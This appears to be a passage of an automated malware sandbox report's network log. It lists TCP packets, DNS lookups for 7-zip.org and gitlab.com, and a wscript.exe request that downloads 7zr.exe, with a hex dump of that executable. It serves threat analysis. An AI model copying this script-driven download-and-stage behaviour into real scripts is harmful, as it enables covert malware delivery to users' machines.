                                                                                                  Jun 6, 2023 17:28:28.783740044 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.784156084 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.784173012 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.784462929 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.784506083 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.784614086 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.784614086 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.784631968 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.784939051 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.784970045 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.784971952 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.784991026 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.785046101 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.785047054 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.785710096 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.785743952 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.785998106 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.786046982 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.786092997 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.786092997 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.786108017 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.786160946 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.786160946 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.786856890 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.786890984 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.786983967 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.786984921 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.808541059 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.808567047 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.808598042 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.808613062 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.808917046 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.808917046 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.808929920 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.808954000 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.808962107 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.808979034 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.809390068 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.809390068 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.809405088 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.809428930 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.809525013 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.809653044 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.809653044 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.812748909 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.812766075 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.812987089 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.814152002 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.814171076 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.814189911 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.814214945 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.814230919 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.814254999 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.814495087 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.814495087 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.814773083 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.814773083 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.817908049 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.817928076 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.818339109 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.821618080 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.821635962 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.821654081 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.821686029 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.821698904 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.821719885 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.821881056 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.822063923 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.822204113 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.822204113 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.826966047 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.827018023 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.827307940 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.827307940 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.828686953 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.828717947 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.828735113 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.828763008 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.828783989 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.828800917 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.829090118 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.829090118 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.829298019 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.829298019 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.833529949 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.833549976 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.833877087 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.835668087 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.835692883 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.835717916 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.835736990 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.835752964 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.836082935 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.836082935 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.836093903 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.839060068 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.841093063 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.841093063 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.851701021 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.851744890 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.851856947 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.851908922 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.851922035 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.851952076 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.851978064 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.851995945 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.852020025 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.852020025 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.852030993 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.852111101 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.852111101 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.868175030 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.868218899 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.868371964 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.870461941 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.872395992 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:28.872395992 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:29.185121059 CEST49713443192.168.2.6172.65.251.78
                                                                                                  Jun 6, 2023 17:28:29.185165882 CEST44349713172.65.251.78192.168.2.6
                                                                                                  Jun 6, 2023 17:28:55.935559988 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:28:55.935650110 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:28:55.935795069 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:28:55.937711000 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:28:55.937751055 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:28:56.010042906 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:28:56.013281107 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:28:56.013324022 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:28:56.015234947 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:28:56.015362978 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:28:56.019088984 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:28:56.019301891 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:28:56.062138081 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:28:56.062228918 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:28:56.108900070 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:29:00.302966118 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:29:00.359363079 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:29:05.967175961 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:29:06.016069889 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:29:19.822707891 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:29:19.876635075 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:29:34.081984043 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:29:34.127796888 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:29:48.802306890 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:29:48.847860098 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:29:59.126257896 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:29:59.177083015 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:30:06.028248072 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:30:06.083637953 CEST49714443192.168.2.6141.94.96.144
                                                                                                  Jun 6, 2023 17:30:10.240854979 CEST44349714141.94.96.144192.168.2.6
                                                                                                  Jun 6, 2023 17:30:10.287142038 CEST49714443192.168.2.6141.94.96.144

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Jun 6, 2023 17:28:27.573199034 CEST6322953192.168.2.68.8.8.8
                                                                                                  Jun 6, 2023 17:28:27.601299047 CEST53632298.8.8.8192.168.2.6
                                                                                                  Jun 6, 2023 17:28:28.268532991 CEST6253853192.168.2.68.8.8.8
                                                                                                  Jun 6, 2023 17:28:28.294302940 CEST53625388.8.8.8192.168.2.6

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Jun 6, 2023 17:28:27.573199034 CEST192.168.2.68.8.8.80xd5aeStandard query (0)www.7-zip.orgA (IP address)IN (0x0001)false
                                                                                                  Jun 6, 2023 17:28:28.268532991 CEST192.168.2.68.8.8.80xf57dStandard query (0)gitlab.comA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Jun 6, 2023 17:28:27.601299047 CEST8.8.8.8192.168.2.60xd5aeNo error (0)www.7-zip.org49.12.202.237A (IP address)IN (0x0001)false
                                                                                                  Jun 6, 2023 17:28:28.294302940 CEST8.8.8.8192.168.2.60xf57dNo error (0)gitlab.com172.65.251.78A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • www.7-zip.org
                                                                                                  • gitlab.com

                                                                                                  HTTPS Proxied Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.64971249.12.202.237443C:\Windows\System32\wscript.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2023-06-06 15:28:27 UTC0OUTGET /a/7zr.exe HTTP/1.1
                                                                                                  Accept: */*
                                                                                                  Accept-Language: en-us
                                                                                                  UA-CPU: AMD64
                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                  Host: www.7-zip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2023-06-06 15:28:27 UTC0INHTTP/1.1 200 OK
                                                                                                  Server: nginx/1.18.0 (Ubuntu)
                                                                                                  Date: Tue, 06 Jun 2023 15:28:27 GMT
                                                                                                  Content-Type: application/octet-stream
                                                                                                  Content-Length: 584704
                                                                                                  Last-Modified: Sun, 07 May 2023 16:00:00 GMT
                                                                                                  Connection: close
                                                                                                  ETag: "6457cb00-8ec00"
                                                                                                  Accept-Ranges: bytes
                                                                                                  2023-06-06 15:28:27 UTC0INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 59 9b 72 a4 1d fa 1c f7 1d fa 1c f7 1d fa 1c f7 66 e6 10 f7 1f fa 1c f7 72 e5 17 f7 1e fa 1c f7 9e e6 12 f7 15 fa 1c f7 72 e5 16 f7 16 fa 1c f7 72 e5 18 f7 1f fa 1c f7 93 f2 43 f7 1c fa 1c f7 1d fa 1d f7 85 fa 1c f7 9e f2 41 f7 14 fa 1c f7 2b dc 17 f7 9a fa 1c f7 c4 87 18 f6 1e fa 1c f7 2b dc 16 f7 1e fa 1c f7 06 67 b6 f7 04 fa 1c f7 85 88 1f f6 19 fa 1c f7 da fc 1a f7 1c fa 1c
                                                                                                  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$YrfrrrCA++g
                                                                                                  2023-06-06 15:28:27 UTC16INData Raw: 5d fc e8 3b f8 ff ff 8b 45 14 8b 4d d4 8b 55 d0 8b f0 8d 7d f0 c6 45 f3 01 8b 4c 8a fc c6 45 13 01 66 a5 39 59 04 a4 75 0e 80 65 f3 00 8d 4d d0 e8 50 05 00 00 eb 18 8a 40 02 3c 01 74 0d 3c 02 75 0d e8 0c fa ff ff 84 c0 74 04 80 65 13 00 8d 4d c4 e8 f6 e1 ff ff 83 4d e4 ff 83 7d d4 03 8b 1d c4 91 47 00 c6 45 fc 01 72 2e 8b 45 d0 8b 08 83 79 04 00 75 23 8b 48 04 83 79 04 00 75 1a 8b 40 08 68 8c 93 47 00 8b 00 50 ff d3 59 85 c0 59 75 07 c7 45 e4 02 00 00 00 83 7d 08 02 0f 84 be 00 00 00 83 4d e4 ff 8d 4d d0 e8 bc 01 00 00 83 7d 08 01 8b f8 8b 45 d4 89 7d dc 89 7d ec 74 0e 85 ff 74 0a 3b c7 76 06 8d 48 ff 89 4d ec 83 4d e8 ff 3b f8 73 43 8b 45 d0 68 98 93 47 00 8b 34 b8 8b 06 50 ff d3 59 85 c0 59 74 10 8b 36 68 94 93 47 00 56 ff d3 59 85 c0 59 75 03 89 7d e8
                                                                                                  Data Ascii: ];EMU}ELEf9YueMP@<t<uteMM}GEr.Eyu#Hyu@hGPYYuE}MM}E}}tt;vHMM;sCEhG4PYYt6hGVYYu}
                                                                                                  2023-06-06 15:28:27 UTC32INData Raw: 75 04 32 db eb 47 83 7d f0 00 74 0b ff 75 f0 8b 4d ec e8 53 a6 ff ff 57 8d 45 ac 53 50 8d 4d d0 e8 eb 00 00 00 8b 4d ec 50 c6 45 fc 08 e8 fc a5 ff ff c6 45 fc 07 ff 75 ac e8 08 93 ff ff 59 8d 45 c4 8b 4d ec 50 e8 e3 a5 ff ff b3 01 ff 75 c4 e8 f1 92 ff ff 59 ff 75 d0 e8 e8 92 ff ff 59 8a c3 e9 9b 00 00 00 83 c6 04 8d 4d dc 56 e8 1e a2 ff ff 8b 4d dc c7 45 fc 02 00 00 00 e8 0e fb ff ff 8b f0 8b 45 dc 8d 4d b8 8d 3c 36 03 c7 50 e8 fc a1 ff ff 8d 4d b8 c6 45 fc 03 e8 93 00 00 00 84 c0 75 16 ff 75 b8 e8 9a 92 ff ff ff 75 dc e8 92 92 ff ff 59 32 c0 59 eb 47 ff 35 ec 94 47 00 8b cb e8 a3 a5 ff ff 3b 75 e0 73 0b 8b 45 dc 89 75 e0 66 83 24 07 00 8d 45 dc 8b cb 50 e8 4c a5 ff ff 8d 45 b8 8b cb 50 e8 41 a5 ff ff ff 75 b8 e8 51 92 ff ff ff 75 dc e8 49 92 ff ff 59 59
                                                                                                  Data Ascii: u2G}tuMSWESPMMPEEuYEMPuYuYMVMEEM<6PMEuuuY2YG5G;usEuf$EPLEPAuQuIYY
                                                                                                  2023-06-06 15:28:27 UTC48INData Raw: 28 89 46 18 8b 45 10 89 4e 2c 89 46 20 8b 45 14 89 4e 1c 89 7e 10 8b ce 89 7e 14 89 46 24 e8 b6 01 00 00 3b c7 89 45 0c 74 13 83 4d fc ff 3b f7 74 06 8b 06 56 ff 50 08 8b 45 0c eb 0e 8b 06 57 57 57 57 56 ff 50 10 89 33 33 c0 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c2 10 00 55 8b ec 51 83 65 fc 00 53 8b 5d 14 56 85 db 57 74 03 83 23 00 8b 75 08 8b 55 10 33 c0 8b 7e 14 8b 4e 10 3b c7 72 2b 77 04 3b d1 76 25 0b cf 75 1b 80 7e 19 00 c6 46 18 01 75 07 b8 05 40 00 80 eb 3b 85 db 74 02 89 13 33 c0 eb 31 8b 56 10 89 55 10 8b 4e 08 85 c9 74 14 8b 01 8d 7d 10 57 52 ff 75 0c 51 ff 50 0c 8b 55 10 89 45 fc 29 56 10 83 5e 14 00 85 db 74 02 89 13 8b 45 fc 5f 5e 5b c9 c2 10 00 55 8b ec 51 8b 45 14 85 c0 74 03 83 20 00 53 56 8b 75 08 57 8b 56 14 8b 46 24 8b 7e 10 8b 4e
                                                                                                  Data Ascii: (FEN,F EN~~F$;EtM;tVPEWWWWVP33M_^[dUQeS]VWt#uU3~N;r+w;v%u~Fu@;t31VUNt}WRuQPUE)V^tE_^[UQEt SVuWVF$~N
                                                                                                  2023-06-06 15:28:27 UTC64INData Raw: ff ff 8b 4d fc 89 06 33 c0 66 39 01 0f 94 c0 5e c9 c3 56 8b f1 ff 74 24 08 e8 47 23 ff ff 8b c6 5e c2 04 00 55 8b ec 83 ec 20 56 8b f1 ff 75 0c 8d 4d e0 ff 75 08 e8 71 0e ff ff 8d 45 e0 8b ce 50 e8 24 26 ff ff 5e c9 c2 08 00 55 8b ec 83 ec 44 53 56 57 8b f9 8b 47 08 8d 5f 04 83 f8 01 89 5d e4 89 45 dc 73 1d 6a 00 68 b8 a1 47 00 8d 4d d0 e8 0c fe 00 00 8d 45 d0 68 28 14 48 00 50 e8 52 e6 05 00 8b 75 08 8b 03 8b 08 8d 56 48 89 55 f8 e8 6d 0a 00 00 84 c0 75 21 8b 03 8d 4d d0 8b 00 ff 30 68 a0 a1 47 00 e8 d5 fd 00 00 8d 45 d0 68 28 14 48 00 50 e8 1b e6 05 00 8b 07 80 b8 44 02 00 00 00 74 0e 05 4c 02 00 00 8d 4e 68 50 e8 72 43 ff ff 8b 07 80 b8 58 02 00 00 00 74 13 8b 80 60 02 00 00 8d 8e d8 00 00 00 ff 30 e8 43 23 ff ff 8b 07 80 b8 84 03 00 00 00 74 19 c6 86
                                                                                                  Data Ascii: M3f9^Vt$G#^U VuMuqEP$&^UDSVWG_]EsjhGMEh(HPRuVHUmu!M0hGEh(HPDtLNhPrCXt`0C#t
                                                                                                  2023-06-06 15:28:28 UTC80INData Raw: 3b c3 0f 84 f4 02 00 00 e9 a9 fe ff ff 8b ce e8 2e 12 00 00 8b 45 0c ff 75 d8 80 20 00 e8 24 d3 fe ff ff 75 cc e8 1c d3 fe ff 59 33 c0 59 e9 df 02 00 00 33 ff 3b fb 89 7d ec c6 45 fc 01 89 be 18 01 00 00 89 7d e4 74 06 8b 07 57 ff 50 04 8a 56 30 8b 4d d8 f6 da 8b 86 18 01 00 00 c6 45 fc 06 1b d2 83 e2 02 89 58 18 42 89 58 1c 42 52 51 8d 48 08 e8 71 2d ff ff 84 c0 75 35 8d 45 d8 8b ce 50 ff 35 94 a3 47 00 e8 7e ee ff ff 8b f0 c6 45 fc 01 3b f3 74 13 3b fb 0f 84 5f 02 00 00 8b 07 57 ff 50 08 e9 54 02 00 00 3b fb e9 43 02 00 00 8a 56 3b c6 46 38 01 84 d2 bb 00 10 00 00 0f 84 d4 00 00 00 8b 86 0c 01 00 00 8b 8e 08 01 00 00 85 c0 0f 87 c0 00 00 00 85 c9 0f 86 b8 00 00 00 85 c0 0f 87 b0 00 00 00 72 08 3b cb 0f 83 a6 00 00 00 80 be 00 01 00 00 00 0f 84 99 00 00
                                                                                                  Data Ascii: ;.Eu $uY3Y3;}E}tWPV0MEXBXBRQHq-u5EP5G~E;t;_WPT;CV;F8r;
                                                                                                  2023-06-06 15:28:28 UTC96INData Raw: 05 89 5d c0 8b c3 3b c3 89 45 e4 74 06 8b 08 50 ff 51 04 8b 55 08 89 5d fc 89 5d ec 8d 8c 96 d4 00 00 00 89 4d bc 8d 86 dc 00 00 00 c6 45 fc 01 89 45 c8 8b 00 3b c3 74 0b 3b d3 0f 85 26 04 00 00 50 eb 02 ff 31 8d 4d ec e8 a5 b1 03 00 89 5d e8 8b 45 ec 8d 55 e8 52 68 10 d2 47 00 8b 08 50 c6 45 fc 02 ff 11 39 5d e8 75 0f 8b 86 5c 01 00 00 39 58 10 0f 85 dd 03 00 00 6a 18 e8 91 92 fe ff 3b c3 59 74 0f 89 58 04 c6 40 08 01 c7 00 f0 ab 47 00 eb 02 33 c0 3b c3 89 45 d0 89 45 dc 74 06 8b 08 50 ff 51 04 8b 45 08 89 5d c4 8b 7c 86 44 89 5f 28 89 5f 30 89 5f 2c 89 5f 34 8b 45 ec 8d 55 c4 52 68 40 d2 47 00 8b 08 50 c6 45 fc 04 ff 11 8b 45 c4 3b c3 74 6f ff 76 0c 8b 08 50 ff 51 0c 3b c3 89 45 b8 74 5c 8b 45 c4 c6 45 fc 03 3b c3 74 06 8b 08 50 ff 51 08 8b 45 dc c6 45
                                                                                                  Data Ascii: ];EtPQU]]MEE;t;&P1M]EURhGPE9]u\9Xj;YtX@G3;EEtPQE]|D_(_0_,_4EURh@GPEE;tovPQ;Et\EE;tPQEE
                                                                                                  2023-06-06 15:28:28 UTC112INData Raw: cb ff 50 04 33 f6 ff 75 10 e8 38 53 fe ff ff 75 cc e8 30 53 fe ff ff 75 c0 e8 28 53 fe ff 83 c4 0c ff b5 e4 fe ff ff e8 1a 53 fe ff 59 eb 05 be 57 00 07 80 8b 4d d0 e8 3a e8 03 00 83 4d fc ff 8d 8d 10 ff ff ff e8 c3 cb ff ff 8b c6 8b 4d f4 5f 5e 5b 64 89 0d 00 00 00 00 c9 c2 10 00 55 8b ec 51 51 53 56 8b 75 10 88 55 ff 8b 55 0c 6a 04 33 db 58 89 1e 3b d3 89 4d f8 89 46 04 77 19 72 09 81 7d 08 00 09 3d 00 73 0e 38 5d ff 75 09 c7 45 08 00 09 3d 00 33 d2 3b d0 72 10 77 09 81 7d 08 00 c8 17 a8 72 05 38 5d ff 74 31 39 5d f8 74 1c 52 ff 75 08 53 ff 75 f8 e8 f8 28 05 00 53 68 e8 03 00 00 52 50 e8 bb 27 05 00 eb 0b 8b 45 08 6a 02 59 e8 9e 28 05 00 89 06 89 56 04 5e 5b c9 c2 0c 00 b8 03 43 47 00 e8 c9 25 05 00 51 56 8b f1 33 c0 89 75 f0 89 06 89 46 04 89 46 08 8d
                                                                                                  Data Ascii: P3u8Su0Su(SSYWM:MM_^[dUQQSVuUUj3X;MFwr}=s8]uE=3;rw}r8]t19]tRuSu(ShRP'EjY(V^[CG%QV3uFF
                                                                                                  2023-06-06 15:28:28 UTC128INData Raw: 8b f9 8b 77 04 85 f6 74 20 53 8b 07 4e 8b 1c b0 85 db 74 10 ff 73 28 e8 2a 13 fe ff 53 e8 24 13 fe ff 59 59 85 f6 75 e2 5b ff 37 e8 16 13 fe ff 59 5f 5e c3 b8 e1 48 47 00 e8 78 e6 04 00 51 56 8b f1 89 75 f0 8d 4e 28 c7 45 fc 02 00 00 00 e8 7f 00 00 00 8d 4e 1c c6 45 fc 01 e8 73 00 00 00 80 65 fc 00 8d 4e 10 e8 16 00 00 00 ff 76 04 e8 d2 12 fe ff 59 5e 8b 4d f4 64 89 0d 00 00 00 00 c9 c3 b8 f4 48 47 00 e8 2a e6 04 00 51 56 57 8b f9 89 7d f0 8b 77 04 83 65 fc 00 85 f6 74 1e 53 8b 07 4e 8b 1c b0 85 db 74 0e 8b cb e8 83 ff ff ff 53 e8 8f 12 fe ff 59 85 f6 75 e4 5b ff 37 e8 82 12 fe ff 59 5f 8b 4d f4 5e 64 89 0d 00 00 00 00 c9 c3 56 57 8b f9 8b 77 04 85 f6 74 1e 53 8b 07 4e 8b 1c b0 85 db 74 0e 8b cb e8 88 fe ff ff 53 e8 50 12 fe ff 59 85 f6 75 e4 5b ff 37 e8
